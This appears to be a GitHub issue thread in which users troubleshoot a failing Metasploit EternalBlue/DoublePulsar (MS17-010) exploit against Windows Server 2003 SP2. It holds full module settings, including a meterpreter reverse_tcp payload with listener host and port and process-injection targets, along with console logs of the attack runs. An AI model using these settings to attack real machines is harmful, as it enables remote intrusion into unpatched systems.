petermax2020
commented
7 years ago show options =?
Open Ben3Othman opened 7 years ago
petermax2020
commented
7 years ago show options =?
zhoumo108
commented
7 years ago I also encountered the same problem,so my options:
msf exploit(ms17_010_eternalblue(update)) > # show options Module options (exploit/windows/smb/ms17_010_eternalblue(update)): Name Current Setting Required Description
DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps yes Path directory of Doublepulsar
ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps yes Path directory of Eternalblue
PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 8.8.8.9 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 8.8.8.31 yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name
2 Windows Server 2003 SP1/SP2 (x86)
msf exploit(ms17_010_eternalblue(update)) > exploit [] Started reverse TCP handler on 8.8.8.31:4444 [] 8.8.8.9:445 - Generating Eternalblue XML data [] 8.8.8.9:445 - Generating Doublepulsar XML data [] 8.8.8.9:445 - Generating payload DLL for Doublepulsar [] 8.8.8.9:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 8.8.8.9:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 8.8.8.9:445 - Are you sure it's vulnerable? [] 8.8.8.9:445 - Launching Doublepulsar... [-] 8.8.8.9:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
last,my windows 2003 systeminfo: OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition OS Version: 5.2.3790 Service Pack 2 Build 3790 OS company: Microsoft Corporation OS Component type: Uniprocessor Free System type: X86-based PC
so,i dont't know why? it's a bug?
benintech
commented
2 months ago same thing here - I tried several versions of eternalblue (this one, but also https://github.com/w0rtw0rt/EternalBlue), same result : "[-] Error getting output back from Core; aborting..." "Are you sure it's vulnerable?"
scan clearly shows vulnerability
did anybody manage to use that exploit with windows 2003 sp2 x86 ?
Hi, i've use Eternalblue-Doublepulsar to exploit windows server 2008 R2 x64 and it works good, but it doesn't work for windows 2003 sp2 32bits the metasploit send me this error :: msf exploit(eternalblue_doublepulsar) > exploit
[] Target IP:445 - Generating Eternalblue XML data [] Started bind handler [] Target IP:445 - Generating Doublepulsar XML data [] Target IP:445 - Generating payload DLL for Doublepulsar [] Target IP:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] Target IP:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] Target IP:445 - Are you sure it's vulnerable? [] Target IP:445 - Launching Doublepulsar... [-] Target IP:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
What can be the probleme, i've configure the real parameters for the exploit : system architecture ... ?? please help me and i've checked the target machine vulnerability with the auxiliary(smb_ms17_010) and it return that the host is vulnerable